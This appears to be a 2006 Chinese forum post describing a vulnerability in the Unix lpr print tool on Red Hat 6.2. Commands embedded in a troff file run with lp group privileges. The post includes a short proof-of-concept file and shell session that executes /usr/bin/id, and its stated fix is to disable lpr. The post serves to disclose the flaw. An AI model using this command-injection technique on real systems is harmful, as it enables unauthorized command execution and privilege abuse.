设为首页收藏本站站点地图

游戏藏宝湾

 找回密码
 注册

用新浪微博连接

一步搞定

QQ登录

只需一步,快速开始

查看: 3479|回复: 0

[分享] lpr.exe是什么 [复制链接]

UID
2382
积分
4176
帖子
730
金币
3352 枚
宝物
194 个
荣誉
100 点
曝光
0 * 2张
贡献
0 人
在线时间
312 小时

紫星勋章 初级精华十字勋章 功勋征服勋章

发表于 2006-11-10 15:58:48 |显示全部楼层
lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lpr是UNIX的打印工具,在REDHAT 6.2中lpr存在漏洞允许以lp的组身份执行任意
命令。漏洞问题是在处理troff文件,他们转化为postscript时候产生的。当处理
时,嵌在troff文件里面的命令可以被执行,这个导致lpr配置文件破坏。
测试代码
[zen@continuity /tmp]$ cat asdf
PS
sh D/usr/bin/id>/tmp/yougetanyideasyetD
.PF
[zen@continuity /tmp]$ lpr asdf
[zen@continuity /tmp]$ cat /tmp/yougetanyideasyet
uid=500(zen) gid=500(zen) groups=7(lp)
解决方案
暂时关闭lpr程序。
您需要登录后才可以回帖 登录 | 注册

手机版|联系方式|Archiver|游戏藏宝湾 ( 鄂ICP备11008100号 )  

GMT+8, 2012-2-6 03:24 , Processed in 0.157453 second(s), 10 queries , Gzip On, Memcache On.

宝湾法律顾问:ITLAW-庄毅雄

Powered by Discuz! X2

© 2001-2011 Comsenz Inc.

回顶部